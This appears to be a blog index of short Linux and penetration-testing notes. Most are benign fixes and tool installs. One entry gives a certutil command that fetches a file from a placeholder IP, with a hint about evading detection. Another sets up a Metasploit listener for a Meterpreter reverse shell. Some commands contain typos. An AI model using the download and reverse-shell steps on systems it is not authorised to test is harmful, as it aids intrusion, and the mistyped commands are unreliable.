[Solved] Resolv.conf is not updated after an OpenVPN connection

After connecting a VPN on Linux (my case an Ubuntu) that resolv.conf is not updated and you can’t resolve names from that network as expected. After searching a bit I found this website that gave me a solution. You can check in detail here:–resolvconf-is-not-updated-2470 After connection to the VPN has been performed, we can observe that resolv.conf hasn’t been updated. $ cat /etc/resolv.conf Modify your opvn file and these

Impacket installation

Impacket is a collection of Python classes for working with network protocols. Installation process: Download last release. Extract the file. Install the requirements. Install the package. $ pip install -r requirements.txt If we have an error installing wheel package, we can do it individually. $ pip install wheel Now run the configuration script. $ python bdist_wheel Let’s try to install the requirements again: $ pip install -r requirements.txt

Download a file using Certutil.exe

Certutil.exe can be used to download a file to a Windows machine. This command will download the «file» in the Windows machine from «http://<ip>« certutil.exe -urlcache -split -f http:///file file Depending on the file, it could be detected as malicious and then be blocked. A possible solution may be using the method described in this post from The trick is based on a base64 encoding file when sending the

Autorecon install

AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. It is intended as a time-saving tool for use in CTFs and other penetration testing environments (e.g. OSCP). It may also be useful in real-world engagements. Run installation script $ python3 -m pip install git+ Add /home/ruben/.local/bin to your PATH. Other requirements installation: & sudo apt install seclists curl enum4linux gobuster nbtscan nikto nmap onesixtyone oscanner

GIT Workflow

Create a Metasploit listener

Steps to create a Metasploit listener: msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost msf5 exploit(multi/handler) > set lport 9999 msf5 exploit(multi/handler) > set ExitOnSession false msf5 exploit(multi/handler) > exploit -j sessions -i 1

(Solution) – Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable

Using Metasploit I’ve sometimes seen this error:  [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: ( To solve it:  List processes listening on port 1234 lsof -i :1234 Kill a process with process ID 5678 kill -9 5678

(Solution) Could not apply stored configuration to monitors error

I received this annoying message every time I logged-in in my Linux distro. After a small search with Google I found this solution: cd .cofig mv monitors.xml monitors.xml.oldexit Restart and you won’t see that message again.

(Solution) Add a new directory to home path in Linux

To add a new directory to your home path you just have to append the new directory to the PATH: $vim .bashrc In the last line of the file just add this: export PATH=$PATH:/homr/username/newDirectory/ Finally, restart your terminal.

(Solution) How to get dkpg install the dependencies that requires

kali@kali:~/downloads$ sudo dpkg -i terminus-1.0.106-linux.deb kali@kali:~/downloads$ sudo apt-get -f install kali@kali:~/downloads$ sudo dpkg -i terminus-1.0.106-linux.deb